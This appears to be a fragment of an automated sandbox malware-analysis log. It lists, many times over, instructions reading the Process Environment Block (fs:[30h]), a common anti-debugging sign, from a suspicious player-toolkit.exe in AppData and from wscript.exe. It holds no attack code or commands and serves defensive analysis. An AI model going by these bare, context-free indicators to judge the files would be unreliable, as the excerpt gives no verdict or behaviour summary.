Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h] 2_2_029EC450
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A44B mov eax, dword ptr fs:[00000030h] 2_2_0298A44B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h] 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h] 2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297746D mov eax, dword ptr fs:[00000030h] 2_2_0297746D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h] 2_2_0298FD9B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h] 2_2_0298FD9B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h] 2_2_02A205AC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h] 2_2_02A205AC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h] 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h] 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h] 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h] 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h] 2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h] 2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h] 2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h] 2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h] 2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h] 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h] 2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h] 2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h] 2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029835A1 mov eax, dword ptr fs:[00000030h] 2_2_029835A1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h] 2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h] 2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h] 2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h] 2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A08DF1 mov eax, dword ptr fs:[00000030h] 2_2_02A08DF1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov ecx, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h] 2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28D34 mov eax, dword ptr fs:[00000030h] 2_2_02A28D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1E539 mov eax, dword ptr fs:[00000030h] 2_2_02A1E539
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h] 2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h] 2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h] 2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h] 2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295AD30 mov eax, dword ptr fs:[00000030h] 2_2_0295AD30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029DA537 mov eax, dword ptr fs:[00000030h] 2_2_029DA537
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02977D50 mov eax, dword ptr fs:[00000030h] 2_2_02977D50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02993D43 mov eax, dword ptr fs:[00000030h] 2_2_02993D43
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D3540 mov eax, dword ptr fs:[00000030h] 2_2_029D3540
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h] 2_2_0297C577
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h] 2_2_0297C577
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A03D40 mov eax, dword ptr fs:[00000030h] 2_2_02A03D40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0849B mov eax, dword ptr fs:[00000030h] 24_2_04B0849B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h] 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB14FB mov eax, dword ptr fs:[00000030h] 24_2_04BB14FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h] 24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC8CD6 mov eax, dword ptr fs:[00000030h] 24_2_04BC8CD6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2BC2C mov eax, dword ptr fs:[00000030h] 24_2_04B2BC2C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h] 24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h] 24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h] 24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h] 24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h] 24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h] 24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h] 24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h] 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1746D mov eax, dword ptr fs:[00000030h] 24_2_04B1746D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h] 24_2_04B8C450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h] 24_2_04B8C450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2A44B mov eax, dword ptr fs:[00000030h] 24_2_04B2A44B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h] 24_2_04BC05AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h] 24_2_04BC05AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B235A1 mov eax, dword ptr fs:[00000030h] 24_2_04B235A1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h] 24_2_04B2FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h] 24_2_04B2FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h] 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h] 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h] 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h] 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BA8DF1 mov eax, dword ptr fs:[00000030h] 24_2_04BA8DF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h] 24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h] 24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov ecx, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B7A537 mov eax, dword ptr fs:[00000030h] 24_2_04B7A537
